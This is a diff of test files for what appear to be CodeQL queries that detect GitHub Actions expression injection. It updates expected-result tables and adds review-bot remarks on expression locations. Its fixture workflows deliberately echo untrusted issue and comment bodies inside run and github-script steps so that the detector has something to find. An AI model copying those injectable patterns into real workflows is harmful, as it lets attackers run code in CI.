.github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | 
.github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | | .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | @@ -349,4 +555,4 @@ calls | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index f30db9af92f..bf52da395fe 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -13,14 +13,18 @@ query predicate jobNodes(Job s) { any() } query predicate stepNodes(Step s) { any() } +query predicate runNodes(Run s) { any() } + +query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() } + query predicate allUsesNodes(Uses s) { any() } query predicate stepUsesNodes(UsesStep s) { any() } query predicate jobUsesNodes(UsesStep s) { any() } -query predicate usesSteps(Uses call, string argname, Expression arg) { - call.getArgument(argname) = arg +query predicate usesSteps(Uses call, string argname, AstNode arg) { + call.getArgumentExpr(argname) = arg } query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 51fb9314685..31e367ac317 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected 
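Review bot: `runExprNodes` is added without a comment saying what it pins, and the rows this commit records for expression_nodes.yml show that the answer is not obvious. In the `|` scripts each expression has its own span (for example 9:25:9:56), but the two expressions in the folded script starting at line 13 are both located at 14:9:15:46, and the two in the quoted script at line 20 are both at 20:14:21:46. If that is a known limit of the location computation rather than the intended result, say so next to the predicate, e.g. `// One row per ${{ }} expression in a run script; expressions in folded (>) or quoted multi-line scripts currently share one location.` The CWE-020 expected files in this commit now report sinks at expression locations, so two sinks in such a script would presumably be reported at the same place and be hard to tell apart in triage.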
@@ -1,15 +1,15 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." 
| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 7bea4429e56..6540b191068 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected 
@@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | 
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 6496731dd6b..063a26bd6ef 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected 
@@ -1,12 +1,12 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index c9e26d368df..a45b9acf416 100644 
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,8 +1,8 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8d091b65547..2cabeaca9fa 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected 
@@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | nodes -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... 
put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index ae21052dcfe..a6be99e1bd0 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... 
put1 }} | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml index 17ead9fdd20..977dccc1b85 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml @@ -5,7 +5,9 @@ jobs: runs-on: ubuntu-latest steps: - run: | + Foo echo '${{ github.event.comment.body }}' + Bar echo-chamber2: runs-on: ubuntu-latest 
@@ -25,4 +27,4 @@ jobs: script: console.log('${{ github.event.issue.body }}') - uses: actions/github-script@v3 with: - script: console.log('${{ github.event.issue.title }}') \ No newline at end of file + script: console.log('${{ github.event.issue.title }}') diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml index 0a64e47f6cb..8968f629dfb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml @@ -7,4 +7,6 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo '${{ github.event.comment.body }}' + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 9d00212e3af..c9ac215666f 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
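Review bot: The three lines added to comment_issue_newline.yml all sit in one literal block (`run: |`), so this fixture exercises the injection query only for the scalar style in which every expression gets its own location. The library fixture expression_nodes.yml in the same commit also covers folded (`>`) and quoted multi-line scripts, where several expressions end up with one shared location, and as far as this fixture goes the query's output for that case is not pinned. I would add a second step that uses `- run: >` with the same `github.event.comment.body` and `github.event.issue.body` lines, so the expected file records how two sinks at one location are reported.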
@@ -1,260 +1,261 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... 
_url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... 
